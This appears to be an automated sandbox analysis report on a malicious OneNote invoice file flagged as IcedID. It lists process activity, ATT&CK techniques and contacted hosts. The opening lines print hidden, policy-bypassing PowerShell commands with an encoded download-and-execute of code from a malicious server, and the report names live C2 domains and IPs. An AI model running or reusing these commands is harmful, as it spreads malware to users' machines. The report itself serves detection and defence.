            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvahiacwbhag4ayqb2agualgb0ag8acaavagcayqb0aguazgauahaaaabwaciakqa=
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvahiacwbhag4ayqb2agualgb0ag8acaavagcayqb0aguazgauahaaaabwaciakqa=Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvahiacwbhag4ayqb2agualgb0ag8acaavagcayqb0aguazgauahaaaabwaciakqa=Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\MZvYng.bin,initJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180052DA0 GetCurrentProcess,GetProcessTimes,GetSystemTimeAsFileTime,10_2_0000000180052DA0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000001752353112C GetComputerNameExW,GetUserNameW,10_2_000001752353112C

            Stealing of Sensitive Information

            barindex
            Yara detected Malicious OneNote
            Source: Yara matchFile source: Inv_02_02_#6.one, type: SAMPLE
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\~Inv_02_02_#6.one.onebackupconstruction, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\Inv_02_02_#6.one, type: DROPPED
            Yara detected IcedID
            Source: Yara matchFile source: 0000000A.00000003.541445122.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.594455037.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.555534226.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.721823197.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.560733182.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.531693872.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.612994519.0000017521BC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.497608477.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.543079236.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.536679847.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.584413640.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.500443586.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.494814109.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.546261720.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.581334234.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.499065524.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.601363468.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.520814674.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.606794312.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.592288032.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.600571140.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.528524217.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.590819954.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.621728773.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.612925082.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.557676790.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.493439373.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5848, type: MEMORYSTR
            Source: Yara matchFile source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality

            barindex
            Yara detected Malicious OneNote
            Source: Yara matchFile source: Inv_02_02_#6.one, type: SAMPLE
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\~Inv_02_02_#6.one.onebackupconstruction, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\Inv_02_02_#6.one, type: DROPPED
            Yara detected IcedID
            Source: Yara matchFile source: 0000000A.00000003.541445122.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.594455037.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.555534226.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.721823197.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.560733182.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.531693872.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.612994519.0000017521BC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.497608477.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.543079236.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.536679847.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.584413640.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.500443586.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.494814109.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.546261720.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.581334234.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.499065524.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.601363468.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.520814674.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.606794312.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.592288032.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.600571140.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.528524217.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.590819954.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.621728773.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.612925082.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.557676790.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.493439373.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5848, type: MEMORYSTR
            Source: Yara matchFile source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts2
            Native API            		2
            Registry Run Keys / Startup Folder            		111
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium13
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts1
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts2
            Registry Run Keys / Startup Folder            		1
            Obfuscated Files or Information            		LSASS Memory1
            Account Discovery            		Remote Desktop Protocol1
            Email Collection            		Exfiltration Over Bluetooth1
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts5
            PowerShell            		Logon Script (Windows)Logon Script (Windows)1
            Masquerading            		Security Account Manager1
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)21
            Virtualization/Sandbox Evasion            		NTDS215
            System Information Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer113
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script111
            Process Injection            		LSA Secrets211
            Security Software Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Rundll32            		Cached Domain Credentials1
            Process Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync21
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            Application Window Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
            Remote System Discovery            		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
            System Network Configuration Discovery            		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 797394 Sample: Inv_02_02_#6.one Startdate: 02/02/2023 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 4 other signatures 2->51 9 mshta.exe 19 2->9         started        12 ONENOTE.EXE 52 501 2->12         started        process3 file4 55 PowerShell case anomaly found 9->55 15 cmd.exe 1 9->15         started        35 C:\Users\user\Desktop\Inv_02_02_#6.one, data 12->35 dropped 37 ~Inv_02_02_#6.one.onebackupconstruction, data 12->37 dropped 18 ONENOTEM.EXE 1 12->18         started        signatures5 process6 signatures7 63 Suspicious powershell command line found 15->63 65 Encrypted powershell cmdline option found 15->65 67 Bypasses PowerShell execution policy 15->67 69 PowerShell case anomaly found 15->69 20 powershell.exe 15 17 15->20         started        25 conhost.exe 15->25         started        process8 dnsIp9 39 corsanave.top 46.151.26.131, 49696, 49697, 80 T4D_RU-ASRU Russian Federation 20->39 33 C:\Users\user\AppData\Local\MZvYng.bin, PE32+ 20->33 dropped 53 Powershell drops PE file 20->53 27 rundll32.exe 20->27         started        file10 signatures11 process12 process13 29 rundll32.exe 27->29         started        dnsIp14 41 kropnagursa.com 45.61.136.59, 49698, 49699, 49700 AS40676US United States 29->41 43 192.168.2.1 unknown unknown 29->43 57 System process connects to network (likely due to code injection or exploit) 29->57 59 Contains functionality to detect hardware virtualization (CPUID execution measurement) 29->59 61 Tries to detect virtualization through RDTSC time measurements 29->61 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://cdn.entity.0%URL Reputationsafe
            https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
            https://api.aadrm.com/0%URL Reputationsafe
            https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
            https://officeci.azurewebsites.net/api/0%URL Reputationsafe
            https://my.microsoftpersonalcontent.com0%URL Reputationsafe
            https://store.office.cn/addinstemplate0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://www.odwebp.svc.ms0%URL Reputationsafe
            https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
            https://d.docs.live.net0%URL Reputationsafe
            https://ncus.contentsync.0%URL Reputationsafe
            https://wus2.contentsync.0%URL Reputationsafe
            https://skyapi.live.net/Activity/0%URL Reputationsafe
            https://api.cortana.ai0%URL Reputationsafe
            https://staging.cortana.ai0%URL Reputationsafe
            https://wus2.pagecontentsync.0%URL Reputationsafe
            https://cortana.ai/api0%URL Reputationsafe
            https://powerlift.acompli.net0%URL Reputationsafe
            https://cortana.ai0%URL Reputationsafe
            https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
            http://kropnagursa.com:80/w0%Avira URL Cloudsafe
            http://kropnagursa.com:80/PG0%Avira URL Cloudsafe
            http://kropnagursa.com/h0%Avira URL Cloudsafe
            http://kropnagursa.com/f0%Avira URL Cloudsafe
            http://kropnagursa.com/e0%Avira URL Cloudsafe
            https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
            http://kropnagursa.com/X0%Avira URL Cloudsafe
            http://kropnagursa.com/b0%Avira URL Cloudsafe
            http://kropnagursa.com/Ml0%Avira URL Cloudsafe
            http://kropnagursa.com:80/0%Avira URL Cloudsafe
            kropnagursa.com0%Avira URL Cloudsafe
            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
            http://kropnagursa.com/1m0%Avira URL Cloudsafe
            http://corsanave.top/dll/loader_D0%Avira URL Cloudsafe
            http://corsanave.top40%Avira URL Cloudsafe
            http://pesterbdd.com/images/Pester.pngD100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            kropnagursa.com
            		45.61.136.59
            		truetrue
              		unknown
              corsanave.top
              		46.151.26.131
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                kropnagursa.comtrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://shell.suite.office.com:144359B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                  		high
                  https://autodiscover-s.outlook.com/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                    		high
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                      		high
                      https://cdn.entity.59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                        		high
                        https://rpsticket.partnerservices.getmicrosoftkey.com59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://lookup.onenote.com/lookup/geolocation/v159B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                          		high
                          http://kropnagursa.com/Mlrundll32.exe, 0000000A.00000003.431713420.0000017521B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                            		high
                            https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                              		high
                              https://api.aadrm.com/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                		high
                                https://api.microsoftstream.com/api/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                  		high
                                  https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                    		high
                                    https://cr.office.com59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.449646578.00000000059A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.433111959.0000000004941000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://res.getmicrosoftkey.com/api/redemptionevents59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://tasks.office.com59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                            		high
                                            https://officeci.azurewebsites.net/api/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://my.microsoftpersonalcontent.com59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://store.office.cn/addinstemplate59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://kropnagursa.com:80/PGrundll32.exe, 0000000A.00000003.452775566.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.451262478.0000017521B90000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://messaging.engagement.office.com/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                		high
                                                https://contoso.com/Iconpowershell.exe, 00000004.00000002.449646578.00000000059A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                  		high
                                                  https://www.odwebp.svc.ms59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
